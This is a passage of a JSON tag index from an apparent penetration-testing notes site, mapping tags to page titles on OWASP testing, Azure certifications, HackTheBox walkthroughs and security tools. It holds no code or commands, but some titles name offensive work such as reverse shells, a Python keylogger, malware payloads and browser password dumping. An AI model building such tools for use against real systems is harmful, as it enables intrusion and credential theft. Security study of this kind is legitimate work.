                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-04","title":"WSTG-INPV-04","text":"
                                            • Testing for HTTP Parameter Pollution - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-05","title":"WSTG-INPV-05","text":"
                                            • Testing for SQL Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-06","title":"WSTG-INPV-06","text":"
                                            • Testing for LDAP Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-07","title":"WSTG-INPV-07","text":"
                                            • Testing for XML Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-08","title":"WSTG-INPV-08","text":"
                                            • Testing for SSI Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-09","title":"WSTG-INPV-09","text":"
                                            • Testing for XPath Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-10","title":"WSTG-INPV-10","text":"
                                            • Testing for IMAP SMTP Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-11","title":"WSTG-INPV-11","text":"
                                            • Testing for Code Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-12","title":"WSTG-INPV-12","text":"
                                            • Testing for Command Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-13","title":"WSTG-INPV-13","text":"
                                            • Testing for Format String Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-14","title":"WSTG-INPV-14","text":"
                                            • Testing for Incubated Vulnerability - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-15","title":"WSTG-INPV-15","text":"
                                            • Testing for HTTP Splitting Smuggling - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-16","title":"WSTG-INPV-16","text":"
                                            • Testing for HTTP Incoming Requests - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-17","title":"WSTG-INPV-17","text":"
                                            • Testing for Host Header Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-18","title":"WSTG-INPV-18","text":"
                                            • Testing for Server-side Template Injection - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-19","title":"WSTG-INPV-19","text":"
                                            • Testing for Server-Side Request Forgery - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-inpv-20","title":"WSTG-INPV-20","text":"
                                            • Testing for Mass Assignment - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-01","title":"WSTG-SESS-01","text":"
                                            • Testing for Session Management Schema - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-02","title":"WSTG-SESS-02","text":"
                                            • Testing for Cookies Attributes - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-03","title":"WSTG-SESS-03","text":"
                                            • Testing for Session Fixation - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-04","title":"WSTG-SESS-04","text":"
                                            • Testing for Exposed Session Variables - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-05","title":"WSTG-SESS-05","text":"
                                            • Testing for Cross Site Request Forgery - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-06","title":"WSTG-SESS-06","text":"
                                            • Testing for Logout Functionality - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-07","title":"WSTG-SESS-07","text":"
                                            • Testing Session Timeout - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-08","title":"WSTG-SESS-08","text":"
                                            • Testing for Session Puzzling - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-09","title":"WSTG-SESS-09","text":"
                                            • Testing for Session Hijacking - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#wstg-sess-10","title":"WSTG-SESS-10","text":"
                                            • Testing JSON Web Tokens - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#active","title":"active","text":"
                                            • Port 389 - 636 LDAP
                                            ","tags":["tags"]},{"location":"tags/#active-directory","title":"active directory","text":"
                                            • Active Directory - LDAP
                                            • The ActiveDirectory PowerShell module
                                            • BloodHound
                                            • evil-winrm
                                            • Microsoft Management Console (MMC)
                                            • NT Authority System
                                            • PowerUp.ps1
                                             • Responder.py - An SMB server to listen for NTLM hashes
                                            • SharpView
                                            ","tags":["tags"]},{"location":"tags/#active-recon","title":"active recon","text":"
                                            • nmap - A network exploration and security auditing tool
                                            • Powercat - An alternative to netcat coded in PowerShell
                                            ","tags":["tags"]},{"location":"tags/#aes","title":"aes","text":"
                                            • TCP reverse shell with AES encryption
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            ","tags":["tags"]},{"location":"tags/#amazon","title":"amazon","text":"
                                            • AWS cli
                                            ","tags":["tags"]},{"location":"tags/#amazon-web-services","title":"amazon web services","text":"
                                            • Amazon Web Services (AWS) Essentials
                                            ","tags":["tags"]},{"location":"tags/#android","title":"android","text":"
                                            • scrcpy
                                            ","tags":["tags"]},{"location":"tags/#apache-cloudstack","title":"apache cloudstack","text":"
                                            • Apache CloudStack Essentials
                                            ","tags":["tags"]},{"location":"tags/#api","title":"api","text":"
                                            • arjun
                                            • Hacking APIs
                                            • API authentication attacks
                                             • API Reconnaissance
                                            • Endpoint analysis
                                             • Evasion and combining techniques
                                            • Exploiting API Authorization
                                            • Testing for improper assets management
                                            • Injection attacks
                                            • Mass assignment
                                            • Setting up the labs + Writeups
                                            • Scanning APIs
                                            • SSRF attack - Server-side Request Forgery
                                            • Setting up the environment
                                            ","tags":["tags"]},{"location":"tags/#arp","title":"arp","text":"
                                            • Arp poisoning
                                            ","tags":["tags"]},{"location":"tags/#arp-poisoning","title":"arp poisoning","text":"
                                            • Arp poisoning
                                            ","tags":["tags"]},{"location":"tags/#assessment","title":"assessment","text":"
                                            • Vulnerability assessment
                                            ","tags":["tags"]},{"location":"tags/#attack","title":"attack","text":"
                                            • Broken access control
                                            • Buffer Overflow attack
                                            • Captcha Replay attack
                                            • Carriage Return and Linefeed - CRLF Attack
                                            • XFS attack - Cross-frame Scripting
                                            • CSRF attack - Cross Site Request Forgery
                                            • XSS attack - Cross-Site Scripting
                                            • Insecure deserialization
                                            ","tags":["tags"]},{"location":"tags/#authentication","title":"authentication","text":"
                                            • HTTP Authentication Schemes
                                            ","tags":["tags"]},{"location":"tags/#aws","title":"aws","text":"
                                            • AWS cli
                                            • Amazon Web Services (AWS) Essentials
                                            ","tags":["tags"]},{"location":"tags/#az-104","title":"az-104","text":"
                                            • AZ-104 Microsoft Azure Administrator certificate
                                            ","tags":["tags"]},{"location":"tags/#az-500","title":"az-500","text":"
                                            • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                                            • AZ-500 Microsoft Azure Active Directory- Platform protection
                                            • AZ-500 Microsoft Azure Active Directory- Data and applications
                                            • AZ-500 Microsoft Azure Active Directory- Security operations
                                            • Exams - Practice the AZ-500
                                            • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                                            • AZ-500 Microsoft Azure Security Technologies Certificate
                                            ","tags":["tags"]},{"location":"tags/#az-900","title":"az-900","text":"
                                            • Exams - Practice the AZ-900
                                            • AZ-900 Notes to get through the Azure Fundamentals Certificate
                                            ","tags":["tags"]},{"location":"tags/#azure_1","title":"azure","text":"
                                            • Azure-CLI
                                            • Azure Powershell
                                            • AZ-104 Microsoft Azure Administrator certificate
                                            • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                                            • AZ-500 Microsoft Azure Active Directory- Platform protection
                                            • AZ-500 Microsoft Azure Active Directory- Data and applications
                                            • AZ-500 Microsoft Azure Active Directory- Security operations
                                            • Exams - Practice the AZ-500
                                            • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                                            • AZ-500 Microsoft Azure Security Technologies Certificate
                                            • Exams - Practice the AZ-900
                                            • AZ-900 Notes to get through the Azure Fundamentals Certificate
                                            ","tags":["tags"]},{"location":"tags/#azure-cli","title":"azure-cli","text":"
                                            • Azure-CLI
                                            ","tags":["tags"]},{"location":"tags/#backdoors","title":"backdoors","text":"
                                            • Evading detection in file transfers
                                            • Transferring files with code
                                            • Transferring files techniques - Linux
                                            • Transferring files techniques - Windows
                                            ","tags":["tags"]},{"location":"tags/#bash","title":"bash","text":"
                                             • Package manager
                                            • Azure-CLI
                                            • bash - Bourne Again Shell
                                            • curl
                                            • unshadow
                                            • vnstat - Monitoring network impact
                                            ","tags":["tags"]},{"location":"tags/#basic-digest","title":"basic digest","text":"
                                            • HTTP Authentication Schemes
                                            ","tags":["tags"]},{"location":"tags/#bcm","title":"bcm","text":"
                                            • 623 - Intelligent Platform Management Interface (IPMI)
                                            ","tags":["tags"]},{"location":"tags/#binaries","title":"binaries","text":"
                                             • LOLBins - Living off the land binaries - LOLBAS and GTFOBins
                                            ","tags":["tags"]},{"location":"tags/#bind-shells","title":"bind shells","text":"
                                            • Bind Shells
                                            ","tags":["tags"]},{"location":"tags/#binscope","title":"binscope","text":"
                                            • Common vulnerabilities
                                            ","tags":["tags"]},{"location":"tags/#browsers","title":"browsers","text":"
                                            • Pentesting browsers
                                             • Man-in-the-browser attack
                                            ","tags":["tags"]},{"location":"tags/#brute-force","title":"brute force","text":"
                                            • John the Ripper - A hash cracker and dictionary attack tool
                                            ","tags":["tags"]},{"location":"tags/#brute-forcing","title":"brute forcing","text":"
                                            • hydra
                                            • medusa
                                            ","tags":["tags"]},{"location":"tags/#burpsuite","title":"burpsuite","text":"
                                            • Burpsuite
                                            • Interactsh - An alternative to BurpSuite Collaborator
                                            • BurpSuite Labs - Broken access control vulnerabilities
                                            • BurpSuite Labs - Insecure deserialization
                                            • BurpSuite Labs - Json Web Token jwt
                                            • BurpSuite Labs
                                            • BurpSuite Labs - SQL injection
                                            • BurpSuite Labs - Server Side Request Forgery
                                            • BurpSuite Labs - Server Side Template Injection
                                            • BurpSuite Labs - Cross-site Scripting
                                            • BurpSuite Labs - Json Web Token jwt
                                            • Traffic analysis - Thick client Applications
                                            ","tags":["tags"]},{"location":"tags/#bypass-techniques","title":"bypass techniques","text":"
                                             • VirtualBox and Extension Pack
                                            ","tags":["tags"]},{"location":"tags/#bypassing-firewall","title":"bypassing firewall","text":"
                                            • Bypassing Next Generation Firewalls
                                            ","tags":["tags"]},{"location":"tags/#bypassing-techniques","title":"bypassing techniques","text":"
                                            • Bypassing Next Generation Firewalls
                                             • Hijack the Internet Explorer process to bypass a host-based firewall
                                            ","tags":["tags"]},{"location":"tags/#certification","title":"certification","text":"
                                            • eWPT Preparation
                                            • AZ-104 Microsoft Azure Administrator certificate
                                            • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                                            • AZ-500 Microsoft Azure Active Directory- Platform protection
                                            • AZ-500 Microsoft Azure Active Directory- Data and applications
                                            • AZ-500 Microsoft Azure Active Directory- Security operations
                                            • Exams - Practice the AZ-500
                                            • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                                            • AZ-500 Microsoft Azure Security Technologies Certificate
                                            • Exams - Practice the AZ-900
                                            • AZ-900 Notes to get through the Azure Fundamentals Certificate
                                            ","tags":["tags"]},{"location":"tags/#cheat","title":"cheat","text":"
                                            • Pentesting Powerapp
                                            ","tags":["tags"]},{"location":"tags/#cheat-sheet","title":"cheat sheet","text":"
                                            • msSQL - Microsoft SQL Server
                                             • Responder.py - An SMB server to listen for NTLM hashes
                                            • sqsh
                                            ","tags":["tags"]},{"location":"tags/#checklist","title":"checklist","text":"
                                            • Thick client Applications Pentesting Checklist
                                            ","tags":["tags"]},{"location":"tags/#checksum","title":"checksum","text":"
                                            • Checksum
                                            ","tags":["tags"]},{"location":"tags/#chrome","title":"chrome","text":"
                                            • Pentesting browsers
                                            ","tags":["tags"]},{"location":"tags/#cloud","title":"cloud","text":"
                                            • AWS cli
                                            • Azure-CLI
                                            • Azure Powershell
                                            • gcloud CLI
                                            • Apache CloudStack Essentials
                                            • Amazon Web Services (AWS) Essentials
                                            • Pentesting Amazon Web Services (AWS)
                                            • AZ-104 Microsoft Azure Administrator certificate
                                            • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                                            • AZ-500 Microsoft Azure Active Directory- Platform protection
                                            • AZ-500 Microsoft Azure Active Directory- Data and applications
                                            • AZ-500 Microsoft Azure Active Directory- Security operations
                                            • Exams - Practice the AZ-500
                                            • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                                            • AZ-500 Microsoft Azure Security Technologies Certificate
                                            • Exams - Practice the AZ-900
                                            • AZ-900 Notes to get through the Azure Fundamentals Certificate
                                            • Pentesting Azure
                                            • Pentesting docker
                                            • Google Cloud Platform Essentials
                                            • Openstack Essentials
                                            ","tags":["tags"]},{"location":"tags/#cloud-pentesting","title":"cloud pentesting","text":"
                                            • Pentesting cloud
                                            ","tags":["tags"]},{"location":"tags/#cms_1","title":"cms","text":"
                                            • moodlescan
                                            ","tags":["tags"]},{"location":"tags/#connection-problems","title":"connection problems","text":"
                                             • How to resolve run-of-the-mill connection problems
                                            ","tags":["tags"]},{"location":"tags/#containers","title":"containers","text":"
                                            • Pentesting docker
                                            ","tags":["tags"]},{"location":"tags/#course","title":"course","text":"
                                            • eWPT Preparation
                                            • AZ-104 Microsoft Azure Administrator certificate
                                            • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                                            • AZ-500 Microsoft Azure Active Directory- Platform protection
                                            • AZ-500 Microsoft Azure Active Directory- Data and applications
                                            • AZ-500 Microsoft Azure Active Directory- Security operations
                                            • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                                            • AZ-500 Microsoft Azure Security Technologies Certificate
                                            • AZ-900 Notes to get through the Azure Fundamentals Certificate
                                            ","tags":["tags"]},{"location":"tags/#cpts_1","title":"cpts","text":"
                                            • Contract - Checklist
                                            • Contractors Agreement - Checklist for Physical Assessments
                                            • Rules of Engagement - Checklist
                                            ","tags":["tags"]},{"location":"tags/#cracking-tool","title":"cracking tool","text":"
                                            • Hashcat - A password recovery tool
                                            ","tags":["tags"]},{"location":"tags/#crytography","title":"crytography","text":"
                                            • cryptography
                                            ","tags":["tags"]},{"location":"tags/#cvss","title":"cvss","text":"
                                            • CVSS Common Vulnerability Scoring System
                                            • Microsoft DREAD
                                            ","tags":["tags"]},{"location":"tags/#cybersecurity","title":"cybersecurity","text":"
                                            • Welcome to Hacking Life!
                                            ","tags":["tags"]},{"location":"tags/#database","title":"database","text":"
                                            • MariaDB
                                            • Mongo
                                            • Mongo
                                            • msSQL - Microsoft SQL Server
                                            • MySQL
                                            • Pentesting Powerapp
                                            • sqlite
                                            • sqlite
                                            • sqsh
                                            • Virtual environments
                                            • Virtual environments
                                            ","tags":["tags"]},{"location":"tags/#ddns","title":"ddns","text":"
                                             • Coding a DDNS-aware shell
                                            ","tags":["tags"]},{"location":"tags/#deserialization","title":"deserialization","text":"
                                            • Phpggc - A tool for PHP deserialization
                                            • Ysoserial - A tool for Java deserialization
                                            • BurpSuite Labs - Insecure deserialization
                                            ","tags":["tags"]},{"location":"tags/#dictionaries","title":"dictionaries","text":"
                                            • cewl - A custom dictionary generator
                                            • crunch - A dictionary generator
                                            ","tags":["tags"]},{"location":"tags/#dictionary","title":"dictionary","text":"
                                            • CUPP - Common User Password Profiler
                                             • Dictionaries and wordlist resources
                                            • Creating malware and custom payloads
                                            ","tags":["tags"]},{"location":"tags/#dictionary-attack","title":"dictionary attack","text":"
                                            • John the Ripper - A hash cracker and dictionary attack tool
                                            ","tags":["tags"]},{"location":"tags/#dictionary-generator","title":"dictionary generator","text":"
                                            • CUPP - Common User Password Profiler
                                            ","tags":["tags"]},{"location":"tags/#directory","title":"directory","text":"
                                            • Port 389 - 636 LDAP
                                            ","tags":["tags"]},{"location":"tags/#directory-enumeration","title":"directory enumeration","text":"
                                            • dirb - A web content enumeration tool
                                            ","tags":["tags"]},{"location":"tags/#django","title":"django","text":"
                                            • django pentesting
                                            ","tags":["tags"]},{"location":"tags/#dll-hickjacking","title":"dll hickjacking","text":"
                                             • Attacking thick client applications - Data storage issues
                                            ","tags":["tags"]},{"location":"tags/#dns","title":"dns","text":"
                                            • dig axfr
                                            • dnsenum - A tool to enumerate DNS
                                            • DNSRecon - DNS Enumeration and Scanning Tool
                                            • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                                             • How to resolve run-of-the-mill connection problems
                                            • nslookup
                                            ","tags":["tags"]},{"location":"tags/#dns-enumeration","title":"dns enumeration","text":"
                                            • Amass
                                            ","tags":["tags"]},{"location":"tags/#dnspy","title":"dnspy","text":"
                                             • Attacking thick client applications - Data storage issues
                                            • First challenge - Enabling a button - Thick client Applications
                                             • Reversing and patching thick client applications
                                            ","tags":["tags"]},{"location":"tags/#docker","title":"docker","text":"
                                            • docker
                                            • Pentesting docker
                                            ","tags":["tags"]},{"location":"tags/#domain","title":"domain","text":"
                                            • Port 53 - Domain Name Server (DNS)
                                             • crt.sh
                                            • dnscan - A DNS subdomain scanner
                                            ","tags":["tags"]},{"location":"tags/#dorking","title":"dorking","text":"
                                             • GitHub dorks
                                            • Google dorks
                                            ","tags":["tags"]},{"location":"tags/#dorkings","title":"dorkings","text":"
                                            • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                                             • Conduct Search Engine Discovery Reconnaissance for Information Leakage - OWASP Web Security Testing Guide
                                            • Fingerprint Web Server - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#dotpeek","title":"dotpeek","text":"
                                             • Reversing and patching thick client applications
                                            ","tags":["tags"]},{"location":"tags/#dovecot","title":"dovecot","text":"
                                             • 55006-55007 Dovecot POP3
                                            ","tags":["tags"]},{"location":"tags/#dread","title":"dread","text":"
                                            • Microsoft DREAD
                                            ","tags":["tags"]},{"location":"tags/#dump-hashes","title":"dump hashes","text":"
                                            • CrackMapExec
                                            • Invoke-TheHash
                                            • mimikatz
                                            • pypykatz
                                            ","tags":["tags"]},{"location":"tags/#ewpt","title":"eWPT","text":"
                                            • 01. Information Gathering / Footprinting
                                            • Pentesting Notes
                                            ","tags":["tags"]},{"location":"tags/#echo-mirage","title":"echo mirage","text":"
                                            • Traffic analysis - Thick client Applications
                                            ","tags":["tags"]},{"location":"tags/#encryption","title":"encryption","text":"
                                            • TCP reverse shell with AES encryption
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            • TCP reverse shell with RSA encryption
                                            ","tags":["tags"]},{"location":"tags/#engagement","title":"engagement","text":"
                                            • Contract - Checklist
                                            • Contractors Agreement - Checklist for Physical Assessments
                                            ","tags":["tags"]},{"location":"tags/#enumeration","title":"enumeration","text":"
                                            • The ActiveDirectory PowerShell module
                                            • Amass
                                             • Aquatone - Automate web scanning across large subdomain lists
                                            • BloodHound
                                            • braa - SNMP scanner
                                            • cewl - A custom dictionary generator
                                            • crunch - A dictionary generator
                                            • CUPP - Common User Password Profiler
                                            • dig axfr
                                            • dnsenum - A tool to enumerate DNS
                                            • DNSRecon - DNS Enumeration and Scanning Tool
                                            • enum
                                            • enum4linux
                                            • EyeWitness
                                            • ffuf - A fast web fuzzer written in Go
                                            • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                                            • Hashcat - A password recovery tool
                                            • Bank - A HackTheBox machine
                                            • Popcorn - A HackTheBox machine
                                            • httprint - A web server fingerprinting tool
                                            • JAWS - Just Another Windows (Enum) Script
                                            • John the Ripper - A hash cracker and dictionary attack tool
                                            • knockpy - A subdomain scanner
                                             • LinEnum - A tool to scan Linux systems
                                            • nslookup
                                            • odat - Oracle Database Attacking Tool
                                            • onesixtyone - Fast and simple SNMP scanner
                                             • Seatbelt - A tool to scan Windows systems
                                            • SharpView
                                            • snmpwalk - SNMP scanner
                                             • WafW00f - A web application firewall (WAF) fingerprinting tool
                                            • Weevely - A PHP webshell backdoor generator
                                            • whatweb - A web scanner
                                            • wpscan - Wordpress Security Scanner
                                            ","tags":["tags"]},{"location":"tags/#evading-detection","title":"evading detection","text":"
                                            • Evading detection in file transfers
                                            ","tags":["tags"]},{"location":"tags/#exploitation","title":"exploitation","text":"
                                            • searchsploit
                                            • Evading detection in file transfers
                                            • Transferring files with code
                                            • Transferring files techniques - Linux
                                            • Transferring files techniques - Windows
                                            • OWASP Web Security Testing Guide
                                            • Web Exploitation Guide
                                            ","tags":["tags"]},{"location":"tags/#file","title":"file","text":"
                                             • exiftool - A tool for metadata editing
                                            ","tags":["tags"]},{"location":"tags/#file-integrity","title":"file integrity","text":"
                                            • Checksum
                                            ","tags":["tags"]},{"location":"tags/#file-transfer","title":"file transfer","text":"
                                            • Setting up servers
                                            ","tags":["tags"]},{"location":"tags/#file-transfer-technique","title":"file transfer technique","text":"
                                            • Evading detection in file transfers
                                            • Transferring files with code
                                            • Transferring files techniques - Linux
                                            • Transferring files techniques - Windows
                                            • uploadserver
                                            ","tags":["tags"]},{"location":"tags/#file-upload","title":"file upload","text":"
                                            • smbmap
                                            ","tags":["tags"]},{"location":"tags/#fingerprinting","title":"fingerprinting","text":"
                                            • httprint - A web server fingerprinting tool
                                            ","tags":["tags"]},{"location":"tags/#firefox","title":"firefox","text":"
                                            • Pentesting browsers
                                             • Man-in-the-browser attack
                                            ","tags":["tags"]},{"location":"tags/#firewall","title":"firewall","text":"
                                            • Bypassing Next Generation Firewalls
                                            ","tags":["tags"]},{"location":"tags/#footprinting","title":"footprinting","text":"
                                            • 01. Information Gathering / Footprinting
                                            ","tags":["tags"]},{"location":"tags/#forensic","title":"forensic","text":"
                                            • Computer Forensic Fundamentals
                                            ","tags":["tags"]},{"location":"tags/#ftp","title":"ftp","text":"
                                            • 21 ftp
                                            • Walkthrough - A HackTheBox machine - Funnel
                                            ","tags":["tags"]},{"location":"tags/#ftp-server","title":"ftp server","text":"
                                             • pyftpdlib - An FTP server written in Python
                                            ","tags":["tags"]},{"location":"tags/#gcp","title":"gcp","text":"
                                            • gcloud CLI
                                            • Google Cloud Platform Essentials
                                            ","tags":["tags"]},{"location":"tags/#google-cloud-platform","title":"google cloud platform","text":"
                                            • gcloud CLI
                                            • Google Cloud Platform Essentials
                                            ","tags":["tags"]},{"location":"tags/#headers","title":"headers","text":"
                                            • CSRF attack - Cross Site Request Forgery
                                            ","tags":["tags"]},{"location":"tags/#host-based-firewall","title":"host based firewall","text":"
                                             • Hijack the Internet Explorer process to bypass a host-based firewall
                                            ","tags":["tags"]},{"location":"tags/#http_1","title":"http","text":"
                                            • netcat
                                            ","tags":["tags"]},{"location":"tags/#idasm","title":"idasm","text":"
                                             • Reversing and patching thick client applications
                                            ","tags":["tags"]},{"location":"tags/#ilasm","title":"ilasm","text":"
                                             • Reversing and patching thick client applications
                                            ","tags":["tags"]},{"location":"tags/#ilspy","title":"ilspy","text":"
                                             • Reversing and patching thick client applications
                                            ","tags":["tags"]},{"location":"tags/#imap","title":"imap","text":"
                                             • Ports 110, 143, 993, 995 IMAP POP3
                                            ","tags":["tags"]},{"location":"tags/#impacket","title":"impacket","text":"
                                            • 1433 msSQL
                                            • smbserver - from impacket
                                            ","tags":["tags"]},{"location":"tags/#information-gathering","title":"information gathering","text":"
                                            • Information gathering
                                            ","tags":["tags"]},{"location":"tags/#information-gathering_1","title":"information-gathering","text":"
                                            • Contract - Checklist
                                            • Contractors Agreement - Checklist for Physical Assessments
                                            • Rules of Engagement - Checklist
                                            ","tags":["tags"]},{"location":"tags/#intelligent-platform-management-interface","title":"intelligent platform management interface","text":"
                                            • 623 - Intelligent Platform Management Interface (IPMI)
                                            ","tags":["tags"]},{"location":"tags/#ipmi","title":"ipmi","text":"
                                            • 623 - Intelligent Platform Management Interface (IPMI)
                                            • IPMItool
                                            ","tags":["tags"]},{"location":"tags/#ips","title":"ips","text":"
                                            • Bypassing IPS with handmade XOR Encryption
                                            ","tags":["tags"]},{"location":"tags/#java","title":"java","text":"
                                            • Log4j
                                            • Ysoserial - A tool for Java deserialization
                                            ","tags":["tags"]},{"location":"tags/#java-rmi","title":"java rmi","text":"
                                            • 1090 java rmi
                                            ","tags":["tags"]},{"location":"tags/#jboss","title":"jboss","text":"
                                            • 8080 JBoss AS Instance 6.1.0
                                            ","tags":["tags"]},{"location":"tags/#jndi","title":"jndi","text":"
                                            • Walkthrough - Unified - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#jwt","title":"jwt","text":"
                                            • BurpSuite Labs - Json Web Token jwt
                                            • BurpSuite Labs - Json Web Token jwt
                                            • Json Web Token attacks
                                            ","tags":["tags"]},{"location":"tags/#keycloak","title":"keycloak","text":"
                                            • Pentesting Keycloak
                                            ","tags":["tags"]},{"location":"tags/#keylogger","title":"keylogger","text":"
                                            • Dumping saved passwords from Google Chrome
                                             • Hijacking KeePass Password Manager
                                             • Simple keylogger in Python
                                            ","tags":["tags"]},{"location":"tags/#labs","title":"labs","text":"
                                            • Basic Lab Setup - Thick client Applications
                                            ","tags":["tags"]},{"location":"tags/#language","title":"language","text":"
                                            • Markdown
                                            ","tags":["tags"]},{"location":"tags/#ldap","title":"ldap","text":"
                                            • Port 389 - 636 LDAP
                                            • Active Directory - LDAP
                                            • The ActiveDirectory PowerShell module
                                            • BloodHound
                                            • Microsoft Management Console (MMC)
                                            • NT Authority System
                                            • PowerUp.ps1
                                             • Responder.py - An SMB server to listen for NTLM hashes
                                            • SharpView
                                            ","tags":["tags"]},{"location":"tags/#linux","title":"linux","text":"
                                            • Arp poisoning
                                            • Configuration files
                                            • Cron jobs - path, wildcards, file overwrite.
                                            • Dirty COW (Copy On Write)
                                            • Kernel vulnerability exploitation
                                            • Linux credentials storage
                                            • lxd
                                             • postfix - An SMTP server
                                            • Process capabilities - getcap
                                            • SSH keys
                                            • Suid Binaries
                                            • Transferring files techniques - Linux
                                            ","tags":["tags"]},{"location":"tags/#linux-pentesting","title":"linux pentesting","text":"
                                             • LinEnum - A tool to scan Linux systems
                                             • linPEAS - A tool to scan Linux systems
                                            • Linux Privilege Checker
                                            ","tags":["tags"]},{"location":"tags/#linux-privilege-escalation","title":"linux privilege escalation","text":"
                                            • Base - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#local-file-inclusion","title":"local file inclusion","text":"
                                            • Responder - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#log4j","title":"log4j","text":"
                                            • Walkthrough - Unified - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#lxd","title":"lxd","text":"
                                            • lxd
                                            ","tags":["tags"]},{"location":"tags/#lxd-exploitation","title":"lxd exploitation","text":"
                                            • Walkthrough - Included - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#mariadb","title":"mariadb","text":"
                                            • 3306 mariadb mysql
                                            • Sequel - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#metasploit","title":"metasploit","text":"
                                            • Lame - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#microsoft","title":"microsoft","text":"
                                            • Exams - Practice the AZ-500
                                            • Exams - Practice the AZ-900
                                            ","tags":["tags"]},{"location":"tags/#mimikatz","title":"mimikatz","text":"
                                            • 3389 RDP
                                            ","tags":["tags"]},{"location":"tags/#mitm-relay","title":"mitm relay","text":"
                                            • Traffic analysis - Thick client Applications
                                            ","tags":["tags"]},{"location":"tags/#mobile-pentesting","title":"mobile pentesting","text":"
                                            • Android Debug Bridge - ADB
                                            • apktool
                                            • drozer - A security testing framework for Android
                                            • Frida - A dynamic instrumentation toolkit
                                            • Mobile Security Framework - MobSF
                                            • Objection
                                            • scrcpy
                                            • Setting up the mobile pentesting environment
                                            ","tags":["tags"]},{"location":"tags/#mongodb","title":"mongodb","text":"
                                            • 27017-27018 mongodb
• Walkthrough - A HackTheBox machine - Mongod
                                            • Walkthrough - Unified - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#moodle","title":"moodle","text":"
                                            • moodlescan
                                            ","tags":["tags"]},{"location":"tags/#mssql","title":"mssql","text":"
                                            • 1433 msSQL
                                            • sqsh
                                            ","tags":["tags"]},{"location":"tags/#mysql","title":"mysql","text":"
                                            • 3306 mariadb mysql
                                            ","tags":["tags"]},{"location":"tags/#nessus","title":"nessus","text":"
                                            • Vulnerability assessment
                                            ","tags":["tags"]},{"location":"tags/#network","title":"network","text":"
                                            • Network traffic capture tools
                                            • vnstat - Monitoring network impact
                                            ","tags":["tags"]},{"location":"tags/#network-services","title":"network services","text":"
                                            • Well-known ports
                                            ","tags":["tags"]},{"location":"tags/#next-generation-firewalls","title":"next generation firewalls","text":"
                                            • Bypassing Next Generation Firewalls
                                            ","tags":["tags"]},{"location":"tags/#nmap","title":"nmap","text":"
                                            • xsltproc
                                            ","tags":["tags"]},{"location":"tags/#odata","title":"oData","text":"
• Pentesting OData
                                            ","tags":["tags"]},{"location":"tags/#of","title":"of","text":"
                                            • Contract - Checklist
                                            • Contractors Agreement - Checklist for Physical Assessments
                                            ","tags":["tags"]},{"location":"tags/#open-source","title":"open source","text":"
                                            • Apache CloudStack Essentials
                                            • Openstack Essentials
                                            ","tags":["tags"]},{"location":"tags/#openssl","title":"openssl","text":"
                                            • openSSL - Cryptography and SSL/TLS Toolkit
                                            ","tags":["tags"]},{"location":"tags/#openvas","title":"openvas","text":"
                                            • Vulnerability assessment
